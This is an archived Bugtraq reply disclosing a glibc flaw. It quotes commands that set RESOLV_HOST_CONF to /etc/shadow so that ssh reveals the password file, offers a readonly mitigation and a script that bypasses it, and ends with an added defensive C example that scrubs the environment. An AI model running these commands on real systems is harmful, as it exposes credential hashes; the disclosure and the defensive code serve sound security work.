[18548] in bugtraq
Re: Glibc Local Root Exploit
daemon@ATHENA.MIT.EDU (Digital Overdrive)
Wed Jan 10 21:34:35 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <3A5CE593.F49B6DAA@dsinet.org>
Date: Wed, 10 Jan 2001 23:43:31 +0100
Reply-To: digiover@dsinet.org
From: Digital Overdrive <digiover@DSINET.ORG>
X-To: Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Charles Stevenson wrote:
>
> Hi all,
> This has been bouncing around on vuln-dev and the debian-devel lists. It
> affects glibc >= 2.1.9x and it would seem many if not all OSes using these
> versions of glibc. Ben Collins writes, "This wasn't supposed to happen, and
> the actual fix was a missing comma in the list of secure env vars that were
> supposed to be cleared when a program starts up suid/sgid (including
> RESOLV_HOST_CONF)." The exploit varies from system to system but in our
> devel version of Yellow Dog Linux I was able to print the /etc/shadow file
> as a normal user in the following manner:
>
> export RESOLV_HOST_CONF=/etc/shadow
> ssh whatever.host.com
huge typo in my previous post...
services has to be profiles ;-)
----
[Credits to ^herman^ in #hit2000 on ircnet]
A temp. solution is to place this in /etc/profiles:
declare -r RESOLV_HOST_CONF
jan@flits102-93:~$ export RESOLV_HOST_CONF=/etc/shadow
bash: RESOLV_HOST_CONF: readonly variable
jan@flits102-93:~$
----
But even here there is a workaround for it:
Make a script (e.g. blaat)
#!/bin/sh
export RESOLV_HOST_CONF=/etc/shadow
ssh whatever.host.com
~$ sh --noprofile blaat
[again credits to ^herman^]
Regards,
Jan (Digital Overdrive)
--
.~. http://www.dsinet.org | http://www.dsinet.org/hackfaq
/V\ digiover@dsinet.org | digiover@cotse.com
/( )\
^^-^^
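The root cause quoted above is a missing comma in glibc's table of environment variables that must be cleared when a program starts setuid/sgid. The following is an added example, written for this page and not code from the post, from glibc, or from ^herman^'s workaround; it shows in C why a dropped comma silently removes an entry (adjacent string literals concatenate), how a size check catches that, and how a privileged program can scrub such variables itself rather than trusting the libc list. The variable names other than RESOLV_HOST_CONF are well-known ones chosen for illustration, and all function names are my own.

```c
/* Added example (not from the original post or from glibc): environment
 * scrubbing for a setuid/sgid program, plus a demonstration of the
 * "missing comma" bug class mentioned in the post. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Variables that must never reach privileged code from an untrusted caller.
 * RESOLV_HOST_CONF is the one from the post; the rest are illustrative
 * additions. The list is NULL-terminated. */
static const char *const unsafe_env[] = {
    "RESOLV_HOST_CONF",
    "LD_PRELOAD",
    "LD_LIBRARY_PATH",
    "HOSTALIASES",
    "LOCALDOMAIN",
    "RES_OPTIONS",
    NULL,
};

/* Deliberate reproduction of the bug class: no comma after the first
 * literal, so the compiler concatenates it with the next one and the
 * table silently loses an entry. Kept only to show the effect. */
static const char *const buggy_list[] = {
    "RESOLV_HOST_CONF"   /* <- missing comma */
    "LD_PRELOAD",
    NULL,
};

/* Number of real entries (excluding the NULL terminator). Comparing this
 * against the count the author expects is how a merged entry is caught;
 * here it would report 1 for buggy_list instead of the expected 2. */
size_t count_entries(const char *const *list)
{
    size_t n = 0;
    while (list[n] != NULL)
        n++;
    return n;
}

size_t count_unsafe_env(void)  { return count_entries(unsafe_env); }
size_t count_buggy_list(void)  { return count_entries(buggy_list); }

/* True when the real and effective IDs differ, i.e. the program was
 * started setuid or setgid; this is the condition under which the
 * environment must not be trusted. */
int privileged_context(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Remove every unsafe variable from the process environment and return
 * how many were removed. A real setuid program would call this first
 * thing in main(), before any library code consults the environment. */
int scrub_unsafe_env(void)
{
    int removed = 0;
    for (const char *const *p = unsafe_env; *p != NULL; p++) {
        if (getenv(*p) != NULL) {
            unsetenv(*p);
            removed++;
        }
    }
    return removed;
}

int main(void)
{
    /* Defensive choice: scrub unconditionally, so the result does not
     * depend on whether the binary happens to be installed setuid. */
    int n = scrub_unsafe_env();
    printf("privileged context: %s, variables scrubbed: %d\n",
           privileged_context() ? "yes" : "no", n);
    printf("unsafe_env entries: %zu, buggy_list entries: %zu (expected 2)\n",
           count_unsafe_env(), count_buggy_list());
    return 0;
}
```

Scrubbing in the program itself is belt-and-braces: it works even on a libc whose own secure-variable table is wrong, as it was here, and the entry-count check turns a dropped comma from a silent hole into something a unit test notices.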